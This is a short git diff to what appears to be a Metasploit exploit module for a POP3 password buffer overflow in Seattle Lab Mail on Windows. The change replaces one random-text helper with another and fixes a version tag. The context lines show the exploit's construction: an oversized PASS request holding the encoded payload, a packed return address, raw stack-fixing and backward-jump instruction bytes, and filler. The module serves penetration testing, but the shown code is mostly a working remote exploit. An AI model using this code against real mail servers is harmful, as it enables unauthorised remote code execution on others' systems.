diff --git a/modules/exploits/windows/pop3/seattlelab_pass.rb b/modules/exploits/windows/pop3/seattlelab_pass.rb index 1014c21264..e9f37fad6a 100644 --- a/modules/exploits/windows/pop3/seattlelab_pass.rb +++ b/modules/exploits/windows/pop3/seattlelab_pass.rb @@ -1,5 +1,5 @@ ## -# $Id:$ +# $Id$ ## ## @@ -96,19 +96,19 @@ class Exploits::Windows::Pop3::SeattleLabPass < Msf::Exploit::Remote return end - sock.put("USER #{rand_english_text(10)}\r\n") + sock.put("USER #{rand_text_alphanumeric(10)}\r\n") res = sock.get_once if banner !~ /^\+OK (.*) welcome here$/ print_error("POP3 server rejected username") return end - request = "PASS " + rand_english_text(target['Offset'] - payload.encoded.length) + request = "PASS " + rand_text_alphanumeric(target['Offset'] - payload.encoded.length) request << payload.encoded request << [target.ret].pack('V') request << "\x81\xc4\xff\xef\xff\xff\x44" # fix the stack request << "\xe9\xcb\xfd\xff\xff" # go back 560 bytes - request << rand_english_text(512) # cruft + request << rand_text_alphanumeric(512) # cruft request << "\r\n" sock.put(request)